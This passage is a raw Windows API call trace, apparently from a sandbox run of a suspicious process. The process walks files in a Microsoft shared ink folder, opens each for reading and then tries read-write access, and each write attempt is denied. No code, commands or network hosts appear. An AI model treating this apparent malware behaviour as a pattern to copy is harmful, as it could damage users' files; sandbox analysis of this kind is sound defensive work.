lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0099.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xae) returned 0x81580 [0099.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x81580, cchWideChar=87 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 87 [0099.734] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.735] GetLastError () returned 0x5 [0099.735] GetLastError () returned 0x5 [0099.735] SetLastError (dwErrCode=0x5) [0099.735] GetLastError () returned 0x5 [0099.735] SetLastError (dwErrCode=0x5) [0099.735] GetLastError () returned 0x5 [0099.735] SetLastError (dwErrCode=0x5) [0099.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81580 | out: hHeap=0x20000) returned 1 [0099.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0099.735] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.735] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.735] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xeef, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="symbase.xml", cAlternateFileName="")) returned 1 [0099.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0099.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0099.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0099.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0099.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cb90 [0099.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xee) returned 0x4afd8 [0099.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cb90 | out: hHeap=0x20000) returned 1 [0099.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81130 [0099.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4afd8 | out: hHeap=0x20000) returned 1 [0099.736] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.736] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.736] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.736] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81130 | out: hHeap=0x20000) returned 1 [0099.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.736] AreFileApisANSI () returned 1 [0099.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml", lpUsedDefaultChar=0x0) returned 85 [0099.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0099.736] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.736] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.736] AreFileApisANSI () returned 1 [0099.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0099.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x81918 [0099.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x81918, cchWideChar=85 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml") returned 85 [0099.736] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.737] GetFileType (hFile=0x27c) returned 0x1 [0099.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81918 | out: hHeap=0x20000) returned 1 [0099.737] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.737] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.737] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.737] CloseHandle (hObject=0x27c) returned 1 [0099.738] AreFileApisANSI () returned 1 [0099.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0099.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x81ed8 [0099.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x81ed8, cchWideChar=85 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml") returned 85 [0099.738] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.738] GetLastError () returned 0x5 [0099.738] GetLastError () returned 0x5 [0099.738] SetLastError (dwErrCode=0x5) [0099.738] GetLastError () returned 0x5 [0099.738] SetLastError (dwErrCode=0x5) [0099.738] GetLastError () returned 0x5 [0099.738] SetLastError (dwErrCode=0x5) [0099.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81ed8 | out: hHeap=0x20000) returned 1 [0099.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0099.738] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.738] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.738] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0xa8, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x4ebd0, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0xa8, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧໯")) returned 0 [0099.738] FindClose (in: hFindFile=0x78490 | out: hFindFile=0x78490) returned 1 [0099.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0099.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0099.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0099.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ce30 | out: hHeap=0x20000) returned 1 [0099.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0099.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0099.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0099.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0099.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0099.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0099.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0099.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x4ebc8 [0099.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0099.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ce30 [0099.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0099.739] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.739] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.739] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.739] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ce30 | out: hHeap=0x20000) returned 1 [0099.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.739] AreFileApisANSI () returned 1 [0099.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml", lpUsedDefaultChar=0x0) returned 77 [0099.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0099.739] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.739] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.740] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0099.740] AreFileApisANSI () returned 1 [0099.740] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0099.740] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8cf80 [0099.740] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8cf80, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml") returned 77 [0099.740] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0099.740] GetFileType (hFile=0x418) returned 0x1 [0099.740] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cf80 | out: hHeap=0x20000) returned 1 [0099.740] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.740] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.741] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.741] CloseHandle (hObject=0x418) returned 1 [0099.741] AreFileApisANSI () returned 1 [0099.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0099.741] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8cd88 [0099.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8cd88, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml") returned 77 [0099.741] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.741] GetLastError () returned 0x5 [0099.741] GetLastError () returned 0x5 [0099.741] SetLastError (dwErrCode=0x5) [0099.741] GetLastError () returned 0x5 [0099.741] SetLastError (dwErrCode=0x5) [0099.741] GetLastError () returned 0x5 [0099.741] SetLastError (dwErrCode=0x5) [0099.741] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cd88 | out: hHeap=0x20000) returned 1 [0099.741] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0099.741] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.741] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0099.741] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.741] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.742] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x98, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x5fdd0, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x98, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧ɏ")) returned 0 [0099.742] FindClose (in: hFindFile=0x78690 | out: hFindFile=0x78690) returned 1 [0099.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0099.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0099.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0099.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0099.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0099.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0099.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46908 | out: hHeap=0x20000) returned 1 [0099.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0099.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0099.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0099.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0099.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0099.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0099.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0099.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0099.742] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.742] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.742] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.742] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0099.742] AreFileApisANSI () returned 1 [0099.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL", lpUsedDefaultChar=0x0) returned 57 [0099.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0099.742] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.743] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.743] AreFileApisANSI () returned 1 [0099.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0099.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0099.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL") returned 57 [0099.743] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.743] GetLastError () returned 0x5 [0099.743] GetLastError () returned 0x5 [0099.743] SetLastError (dwErrCode=0x5) [0099.743] GetLastError () returned 0x5 [0099.743] SetLastError (dwErrCode=0x5) [0099.743] GetLastError () returned 0x5 [0099.743] SetLastError (dwErrCode=0x5) [0099.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0099.743] AreFileApisANSI () returned 1 [0099.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0099.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0099.743] 